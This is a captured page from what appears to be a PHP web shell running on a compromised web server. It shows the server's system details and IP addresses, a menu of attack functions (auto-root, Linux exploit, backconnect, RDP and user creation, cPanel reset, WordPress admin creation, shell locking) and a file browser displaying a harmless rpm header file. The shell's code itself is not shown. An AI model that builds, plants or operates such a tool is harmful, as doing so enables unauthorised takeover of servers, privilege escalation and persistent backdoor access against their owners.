Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
include /
rpm /
[ HOME SHELL ]
Name
Size
Permission
Action
argv.h
4.11
KB
-rw-r--r--
header.h
13.37
KB
-rw-r--r--
rpmbase64.h
1023
B
-rw-r--r--
rpmbuild.h
3.28
KB
-rw-r--r--
rpmcallback.h
1.38
KB
-rw-r--r--
rpmcli.h
12.45
KB
-rw-r--r--
rpmdb.h
6.15
KB
-rw-r--r--
rpmds.h
11.61
KB
-rw-r--r--
rpmfc.h
2.44
KB
-rw-r--r--
rpmfi.h
13.02
KB
-rw-r--r--
rpmfileutil.h
5.04
KB
-rw-r--r--
rpmio.h
2.21
KB
-rw-r--r--
rpmkeyring.h
2.59
KB
-rw-r--r--
rpmlegacy.h
7.5
KB
-rw-r--r--
rpmlib.h
5.34
KB
-rw-r--r--
rpmlog.h
8.48
KB
-rw-r--r--
rpmmacro.h
4.21
KB
-rw-r--r--
rpmpgp.h
46.34
KB
-rw-r--r--
rpmpol.h
388
B
-rw-r--r--
rpmprob.h
4.67
KB
-rw-r--r--
rpmps.h
2.29
KB
-rw-r--r--
rpmsign.h
740
B
-rw-r--r--
rpmspec.h
2.21
KB
-rw-r--r--
rpmsq.h
1.34
KB
-rw-r--r--
rpmstring.h
4.08
KB
-rw-r--r--
rpmstrpool.h
3.83
KB
-rw-r--r--
rpmsw.h
2.09
KB
-rw-r--r--
rpmtag.h
20.22
KB
-rw-r--r--
rpmtd.h
12.21
KB
-rw-r--r--
rpmte.h
6.45
KB
-rw-r--r--
rpmts.h
16.8
KB
-rw-r--r--
rpmtypes.h
2.49
KB
-rw-r--r--
rpmurl.h
1.11
KB
-rw-r--r--
rpmutil.h
4.68
KB
-rw-r--r--
rpmvf.h
3.98
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : argv.h
#ifndef _H_ARGV_ #define _H_ARGV_ /** \ingroup rpmargv * \file rpmio/argv.h */ #include <stdio.h> #include <rpm/rpmtypes.h> #ifdef __cplusplus extern "C" { #endif typedef char ** ARGV_t; typedef char * const *ARGV_const_t; typedef int * ARGint_t; struct ARGI_s { unsigned nvals; ARGint_t vals; }; typedef struct ARGI_s * ARGI_t; typedef struct ARGI_s const * const ARGI_const_t; /** \ingroup rpmargv * Print argv array elements. * @param msg output message prefix (or NULL) * @param argv argv array * @param fp output file handle (NULL uses stderr) */ void argvPrint(const char * msg, ARGV_const_t argv, FILE * fp); /** \ingroup rpmargv * Destroy an argi array. * @param argi argi array * @return NULL always */ ARGI_t argiFree(ARGI_t argi); /** \ingroup rpmargv * Create an empty argv array. * @return pointer to empty argv */ ARGV_t argvNew(void); /** \ingroup rpmargv * Destroy an argv array. * @param argv argv array * @return NULL always */ ARGV_t argvFree(ARGV_t argv); /** \ingroup rpmargv * Return no. of elements in argi array. * @param argi argi array * @return no. of elements */ int argiCount(ARGI_const_t argi); /** \ingroup rpmargv * Return data from argi array. * @param argi argi array * @return argi array data address */ ARGint_t argiData(ARGI_const_t argi); /** \ingroup rpmargv * Return no. of elements in argv array. * @param argv argv array * @return no. of elements */ int argvCount(ARGV_const_t argv); /** \ingroup rpmargv * Return data from argv array. * @param argv argv array * @return argv array data address */ ARGV_t argvData(ARGV_t argv); /** \ingroup rpmargv * Compare argv arrays (qsort/bsearch). * @param a 1st instance address * @param b 2nd instance address * @return result of comparison */ int argvCmp(const void * a, const void * b); /** \ingroup rpmargv * Sort an argv array. * @param argv argv array * @param compar strcmp-like comparison function, or NULL for argvCmp() * @return 0 always */ int argvSort(ARGV_t argv, int (*compar)(const void *, const void *)); /** \ingroup rpmargv * Find an element in an argv array. * @param argv argv array * @param val string to find * @param compar strcmp-like comparison function, or NULL for argvCmp() * @return found string (NULL on failure) */ ARGV_t argvSearch(ARGV_const_t argv, const char *val, int (*compar)(const void *, const void *)); /** \ingroup rpmargv * Add an int to an argi array. * @retval *argip argi array * @param ix argi array index (or -1 to append) * @param val int arg to add * @return 0 always */ int argiAdd(ARGI_t * argip, int ix, int val); /** \ingroup rpmargv * Add a string to an argv array. * @retval *argvp argv array * @param val string arg to append * @return 0 always */ int argvAdd(ARGV_t * argvp, const char *val); /** \ingroup rpmargv * Add a number to an argv array (converting to a string). * @retval *argvp argv array * @param val numeric arg to append * @return 0 always */ int argvAddNum(ARGV_t * argvp, int val); /** \ingroup rpmargv * Append one argv array to another. * @retval *argvp argv array * @param av argv array to append * @return 0 always */ int argvAppend(ARGV_t * argvp, ARGV_const_t av); enum argvFlags_e { ARGV_NONE = 0, ARGV_SKIPEMPTY = (1 << 0), /* omit empty strings from result */ }; typedef rpmFlags argvFlags; /** \ingroup rpmargv * Split a string into an argv array. * @param str string arg to split * @param seps separator characters * @param flags flags to control behavior * @return argv array */ ARGV_t argvSplitString(const char * str, const char * seps, argvFlags flags); /** \ingroup rpmargv * Split a string into an argv array. * @retval *argvp argv array * @param str string arg to split * @param seps separator characters * @return 0 always */ int argvSplit(ARGV_t * argvp, const char * str, const char * seps); /** \ingroup rpmargv * Join an argv array into a string. * @param *argv argv array to join * @param sep separator string to use * @return malloc'ed string */ char *argvJoin(ARGV_const_t argv, const char *sep); #ifdef __cplusplus } #endif #endif /* _H_ARGV_ */
Close